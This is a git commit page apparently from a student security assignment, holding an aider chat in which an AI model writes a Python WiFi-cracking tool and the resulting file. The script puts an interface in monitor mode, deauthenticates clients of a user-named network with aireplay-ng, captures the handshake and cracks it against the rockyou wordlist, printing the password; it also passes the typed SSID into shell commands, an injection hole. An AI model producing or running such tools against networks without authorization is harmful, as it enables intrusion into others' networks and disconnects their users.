david/gensec-westgate-djw2
Archived
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

aider: Implemented a Python application to assist in WiFi penetration testing by prompting the user for a target network SSID, capturing the handshake, and cracking the password using a wordlist.

Browse Source 
# Aider chat conversation:

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name (SSID) of a password protected wifi network and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application may utilize a wordlist found at ~/rockyou.txt

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/claude/app.py

ASSISTANT: Here is the Python application to assist in WiFi penetration testing, saved to hw7/claude/app.py:

hw7/claude/app.py
```python
<<<<<<< SEARCH
=======
import subprocess
import re

def run_command(command):
    output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
    return output.decode('utf-8')

def change_to_monitor_mode(interface):
    run_command(f"sudo airmon-ng start {interface}")

def change_to_managed_mode(interface):
    run_command(f"sudo airmon-ng stop {interface}")

def get_wifi_interfaces():
    output = run_command("iwconfig")
    interfaces = re.findall(r"(\w+)\s+IEEE", output)
    return interfaces

def get_target_network(interface):
    while True:
        target_ssid = input("Enter the SSID of the target network: ")
        output = run_command(f"sudo airodump-ng --essid '{target_ssid}' {interface}")
        if target_ssid in output:
            break
        print(f"Network {target_ssid} not found. Please try again.")
    return target_ssid

def capture_handshake(target_network, interface):
    print(f"Capturing handshake for network {target_network}...")
    run_command(f"sudo airodump-ng --essid '{target_network}' --write capture {interface} &")
    run_command(f"sudo aireplay-ng -0 1 -e '{target_network}' {interface}")
    run_command("sudo killall airodump-ng")

def crack_password(capture_file, wordlist):
    print("Cracking password...")
    output = run_command(f"aircrack-ng {capture_file} -w {wordlist}")
    password = re.search(r"KEY FOUND! \[(.*?)\]", output).group(1)
    return password

def main():
    interfaces = get_wifi_interfaces()
    if len(interfaces) == 0:
        print("No WiFi interfaces found.")
        return

    interface = interfaces[0]
    print(f"Using interface {interface}")

    change_to_monitor_mode(interface)

    target_network = get_target_network(interface)
    capture_handshake(target_network, interface)

    change_to_managed_mode(interface)

    capture_file = "capture-01.cap"
    wordlist = "~/rockyou.txt"
    password = crack_password(capture_file, wordlist)

    print(f"Password for network {target_network} is: {password}")

if __name__ == "__main__":
    main()
>>>>>>> REPLACE
```

This application does the following:

1. Gets the available WiFi interfaces using `iwconfig`
2. Prompts the user to enter the SSID of the target network
3. Changes the WiFi interface to monitor mode using `airmon-ng`
4. Captures the handshake for the target network using `airodump-ng` and `aireplay-ng`
5. Changes the WiFi interface back to managed mode
6. Cracks the password using the captured handshake file and a wordlist (`~/rockyou.txt`) with `aircrack-ng`
7. Prints out the cracked password for the target network

It uses `subprocess` to run the shell commands and `re` to parse the output. The WiFi interface is changed between managed and monitor modes as needed.
This commit is contained in:
David Westgate 2024-05-30 14:44:42 -07:00
parent 39f260f5b8
commit c2e9d1eec5
1 changed files with 63 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
hw7/claude/app.py
View File

@ -0,0 +1,63 @@
import subprocess
import re
def run_command(command):
output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
return output.decode('utf-8')
def change_to_monitor_mode(interface):
run_command(f"sudo airmon-ng start {interface}")
def change_to_managed_mode(interface):
run_command(f"sudo airmon-ng stop {interface}")
def get_wifi_interfaces():
output = run_command("iwconfig")
interfaces = re.findall(r"(\w+)\s+IEEE", output)
return interfaces
def get_target_network(interface):
while True:
target_ssid = input("Enter the SSID of the target network: ")
output = run_command(f"sudo airodump-ng --essid '{target_ssid}' {interface}")
if target_ssid in output:
break
print(f"Network {target_ssid} not found. Please try again.")
return target_ssid
def capture_handshake(target_network, interface):
print(f"Capturing handshake for network {target_network}...")
run_command(f"sudo airodump-ng --essid '{target_network}' --write capture {interface} &")
run_command(f"sudo aireplay-ng -0 1 -e '{target_network}' {interface}")
run_command("sudo killall airodump-ng")
def crack_password(capture_file, wordlist):
print("Cracking password...")
output = run_command(f"aircrack-ng {capture_file} -w {wordlist}")
password = re.search(r"KEY FOUND! \[(.*?)\]", output).group(1)
return password
def main():
interfaces = get_wifi_interfaces()
if len(interfaces) == 0:
print("No WiFi interfaces found.")
return
interface = interfaces[0]
print(f"Using interface {interface}")
change_to_monitor_mode(interface)
target_network = get_target_network(interface)
capture_handshake(target_network, interface)
change_to_managed_mode(interface)
capture_file = "capture-01.cap"
wordlist = "~/rockyou.txt"
password = crack_password(capture_file, wordlist)
print(f"Password for network {target_network} is: {password}")
if __name__ == "__main__":
main()